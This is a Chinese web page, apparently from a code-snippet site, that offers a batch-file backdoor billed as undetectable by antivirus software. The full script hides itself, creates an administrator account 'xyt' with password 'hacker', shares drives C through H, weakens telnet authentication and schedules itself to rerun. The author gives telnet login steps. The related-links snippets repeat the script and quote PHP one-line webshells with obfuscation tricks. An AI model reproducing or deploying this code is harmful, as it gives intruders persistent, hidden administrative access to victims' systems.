用批处理写的永不被杀的后门
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为xyt,密码为hacker。
相关推荐
-
用批处理写的永不被杀的后门
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下: @echo off @attrib +s + r xyt.bat @net user xyt hacker /add @net localgroup administrators xyt /add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @net share
-
批处理bat之永不被杀的后门
代码如下: 复制代码 代码如下: @echo off @attrib +s + r xyt.bat @net user xyt hacker /add @net localgroup administrators xyt /add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @net share g$=g: @net share h$=
-
教你识别简单的免查杀PHP后门
一个最常见的一句话后门可能写作这样 <?php @eval($_POST['cmd']);?> 或这样 <?php @assert($_POST['cmd']);?> tudouya 同学在FREEBUF上给出[一种构造技巧]利用 复制代码 代码如下: <?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _
-
用批处理写的后门 永不被杀
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下: @echo off @attrib +s + r xyt.bat @net user xyt hacker /add @net localgroup administrators xyt /add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @net
-
用批处理实现Auto病毒专杀工具的代码
@ echo off color 0a mkdir c:\windows\system32\algssl.exe mkdir c:\windows\system32\msfir80.exe mkdir c:\windows\system32\msime80.exe attrib +s +r +h c:\windows\system32\algssl.exe attrib +s +r +h c:\windows\system32\msfir80.exe attrib +s +r +h c:\win
-
批处理写的电视机效果代码
复制代码 代码如下: @echo off title 收不到台的电视机 :a cls for /l %%b in (1,6,7)do ( color %%bf ) goto a
-
批处理写的 oracle 数据库备份还原工具
这是针对oracle编写的,可以用在不同的电脑上,因为它会自动读取当前电脑的环境变量,从而取得oracle的安装路径,唯一有一点不足的地方是程序中运行过程中会产生一个中间文本文件,不过这并不碍大事,备份或者还原完了以后将会自动删除产生文本文件,代码如下: 复制代码 代码如下: @echo off&setlocal enabledelayedexpansion color 0a :start for /f "tokens=2 delims==" %%a in ('path') d
-
写的不错批处理教程一
大家知不知道默认共享这回事?这东西用不着的地方可就不是好东西了.所以就要删掉.但这东西是每次系统重起后都会重新创建的.所以每次都要重新打开cmd重新删掉一下.极为麻烦.但有了批处理文件就不一样了,先把命令输入到批处理文件中,然后加入到启动项中,每次启动就会自动运行,免去了每次输入命令的麻烦. 如何创建批处理文件? 将记事本打开,什么都不用写,然后选择文件,保存.保存类型选择所有文件,文件名则命名为*.bat这个*代表是文件名,你可以随便的起.保存好之后,看看你保存的地方,会出现一个白色窗口里有个
-
批处理入门与提高
大家知不知道默认共享这回事?这东西用不着的地方可就不是好东西了.所以就要删掉.但这东西是每次系统重起后都会重新创建的.所以每次都要重新打开cmd重新删掉一下.极为麻烦.但有了批处理文件就不一样了,先把命令输入到批处理文件中,然后加入到启动项中,每次启动就会自动运行,免去了每次输入命令的麻烦. 如何创建批处理文件? 将记事本打开,什么都不用写,然后选择文件,保存.保存类型选择所有文件,文件名则命名为*.bat这个*代表是文件名,你可以随便的起.保存好之后,看看你保存的地方,会出现一个白色窗口里有个
-
tel.xls.vbs xls专杀工具
1.双击运行tel.xls.vbs即可消灭Trojan.Win32.Patched.v病毒. 2.本专杀使用VBS脚本编写,执行效率高,不过缺乏智能性,我也不愿去添加那些IF判断语句来进行智能判断,这没必要.只要是我分析的病毒而写出的对于专杀都是有效的,当然病毒变异了那就没办法了,任何专杀都是这样.有变种可以与我联系http://hi.baidu.com/ycosxhack. 3.学习如何用VBS写自己的专杀工具可以查看这里: http://hi.baidu.com/ycosxhack/blog
随机推荐
- Angularjs使用过滤器完成排序功能
- 3个可以改善用户体验的AngularJS指令介绍
- Python中强大的命令行库click入门教程
- 网上比较常用的嵌入网页中的播放器代码收藏
- JavaScript 用cloneNode方法克隆节点的代码
- 微软又爆预留后门 警方可轻松获取硬盘资料
- VC实现ODBC数据库操作实例解析
- 推荐11个实用Python库
- Javascript中的关键字和保留字整理
- mysql:Can't start server: can't create PID file: No space left on device
- MySQL添加外键时报错:1215 Cannot add the foreign key constraint的解决方法
- php引用计数器进行垃圾收集机制介绍
- 优化 SQL Server 索引的小技巧
- 自己动手制作jquery插件之自动添加删除行的实现
- 浅谈JS中json数据的处理
- JS如何判断移动端访问设备并解析对应CSS
- Flex与.NET互操作 使用HttpService、URLReqeust和URLLoader加载/传输数据
- 来自西部数码的WEB服务器安全设置
- SpringMvc微信支付回调示例代码
- 用PHP连接Oracle for NT 远程数据库